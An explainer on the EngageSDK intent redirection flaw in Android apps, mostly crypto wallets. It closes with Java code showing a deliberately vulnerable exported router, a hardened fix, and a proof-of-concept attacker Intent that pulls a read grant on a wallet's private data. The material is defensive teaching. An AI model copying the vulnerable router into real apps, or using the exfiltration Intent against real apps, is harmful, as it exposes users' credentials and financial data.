Android SDK flaw exposed users
Microsoft warned that a vulnerability in an outdated Android software‑development kit left tens of millions of users at risk, including exposure of credentials and financial data. Reports estimate the flaw affected more than 50 million Android users and roughly 30 million wallet installs, highlighting how deprecated mobile components remain a major attack surface. For any firm with a mobile app, the episode underscores the need to track third‑party SDK health as part of security programmes. (techradar.com) (coinpedia.org)
An Android app is really a bundle of other people’s code, and in this case one of those borrowed bundles became the way in. On April 9, 2026, Microsoft said a third-party Android software development kit called EngageSDK exposed sensitive data across apps that had installed it. (microsoft.com)

A software development kit is a prebuilt component that developers drop into an app instead of writing every feature from scratch. EngageSDK was used for messaging and push notifications, so it ran inside the host app with the same permissions the app already had. (microsoft.com) (securityweek.com)

Android keeps apps in separate locked rooms, a design called the application sandbox. Microsoft said this flaw let a malicious app on the same phone trick a vulnerable app into carrying data out of its own locked room. (microsoft.com) (techrepublic.com)

The trick used Android “intents”, the message slips apps pass around to open screens or hand off tasks. Microsoft found an intent redirection bug: the kit accepted an intent supplied by any other app on the device and relaunched it as if it were the host app’s own, so the attacker’s request ran with the host app’s identity and could reach components and data that only the host app itself is allowed to touch. (securityweek.com) (techrepublic.com) Once that happened, the attacker did not need to break Android itself. The malicious app could piggyback on the trusted app’s permissions and reach personal information, login credentials and financial data stored by the vulnerable app. (microsoft.com) (securityweek.com)

The biggest concentration was in crypto wallet apps, where the stakes are unusually high because the app often handles account access and transaction history. Microsoft said wallet apps alone accounted for more than 30 million installs exposed to risk. (microsoft.com) The wider blast radius was even larger: reports citing Microsoft’s findings said apps carrying the vulnerable kit had reached more than 50 million Android users in total. (techradar.com) (techrepublic.com)

Microsoft said it reported the issue to EngageLab in April 2025 and worked with the Android Security Team after that. The vendor fixed the flaw in EngageSDK version 5.2.1 on November 3, 2025. (microsoft.com) (securityweek.com) Google’s side of the response was to remove detected apps using vulnerable versions from Google Play and to add automatic protections for users who had already installed them. Microsoft said it had not seen evidence of the flaw being exploited in the wild as of publication. (microsoft.com) (securityweek.com)

The ugly part of this story is that the weak point was not the wallet app’s main code but a helper component buried inside it. One outdated software development kit turned routine features like notifications into a bridge between a malicious app and data that users assumed stayed private. (microsoft.com) (techrepublic.com)
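To make the intent redirection described above concrete, here is an added example (not code from Microsoft, EngageLab or EngageSDK, and not a description of the actual bug’s internals): a minimal exported “router” activity of the kind a notification SDK might ship, which forwards a caller-supplied Intent under the host app’s identity; the hardened version of the same feature; and the Intent a hostile app on the same phone would send to pull a read grant on the host app’s private content URI. Every package, class, extra name and provider URI here (com.example.wallet, com.attacker, "target", content://com.example.wallet.provider/accounts) is a hypothetical stand-in.

```java
// Added illustration of the intent-redirection bug class; not EngageSDK code.
// All package, class, extra and provider names below are hypothetical.
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

/** VULNERABLE: an exported router (manifest: android:exported="true") that starts
 *  whatever Intent the launching app tucked into the "target" extra. startActivity()
 *  runs with this app's identity, so the caller borrows every permission and every
 *  non-exported component the host app has. */
public class IntentRouterActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent forward = getIntent().getParcelableExtra("target");
        if (forward != null) {
            startActivity(forward);   // caller-controlled Intent, our permissions
        }
        finish();
    }
}

/** HARDENED: same feature, but the nested Intent is only forwarded to screens this app
 *  intended as notification destinations, and URI-grant flags are stripped first. */
class SafeIntentRouterActivity extends Activity {
    private static final Set<ComponentName> ALLOWED_DESTINATIONS = new HashSet<>(Arrays.asList(
            new ComponentName("com.example.wallet", "com.example.wallet.InboxActivity"),
            new ComponentName("com.example.wallet", "com.example.wallet.OfferActivity")));

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent forward = getIntent().getParcelableExtra("target");
        if (forward != null && sanitize(forward)) {
            startActivity(forward);
        }
        finish();
    }

    /** Returns true only if the Intent is safe to forward, mutating it into a safe form. */
    private boolean sanitize(Intent forward) {
        // 1. Resolve where the Intent would actually land and compare against an explicit
        //    allowlist. Anything else (including this app's own non-exported screens, which
        //    the caller could not start by itself) is refused.
        ComponentName dest = forward.resolveActivity(getPackageManager());
        if (dest == null || !ALLOWED_DESTINATIONS.contains(dest)) {
            return false;
        }
        // 2. Never pass on the caller's request that WE grant access to OUR content URIs.
        forward.removeFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION
                | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION);
        // 3. Pin the resolved component so implicit matching cannot shift between check and use.
        forward.setComponent(dest);
        return true;
    }
}

/** Constructed attacker side: what a hostile app installed on the same phone sends.
 *  In reality this lives in the attacker's own package (com.attacker here). */
class ProofOfConceptSender {
    static Intent buildExfilIntent() {
        // Inner Intent: start the ATTACKER's own activity, but ask for a read grant on the
        // wallet's private content URI. The grant is issued by whoever calls startActivity(),
        // and the vulnerable router makes that caller the wallet itself. (The provider must
        // permit grants, e.g. android:grantUriPermissions="true", for this to succeed.)
        Intent inner = new Intent();
        inner.setClassName("com.attacker", "com.attacker.ReceiverActivity");
        inner.setData(Uri.parse("content://com.example.wallet.provider/accounts"));
        inner.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);

        // Outer Intent: aimed at the exported router, carrying the inner one as the extra.
        Intent outer = new Intent();
        outer.setClassName("com.example.wallet", "com.example.wallet.IntentRouterActivity");
        outer.putExtra("target", inner);
        return outer;
    }
}
```

Against IntentRouterActivity, the attacker's ReceiverActivity ends up holding a read grant on the wallet's provider URI; a variant of the same inner Intent can instead name one of the wallet's non-exported activities and have the wallet open it on the attacker's behalf. Against SafeIntentRouterActivity both fail at the allowlist check, and even an allowlisted destination loses its grant flags before it is started. The same three checks (resolve and allowlist the destination, strip grant flags, pin the component) are what androidx.core's IntentSanitizer packages up, which is the form most apps should reach for rather than hand-rolling it. Whichever form is used, the fix has to land in the SDK that owns the exported component, which is why tracking third-party SDK versions is the operational control this story points at.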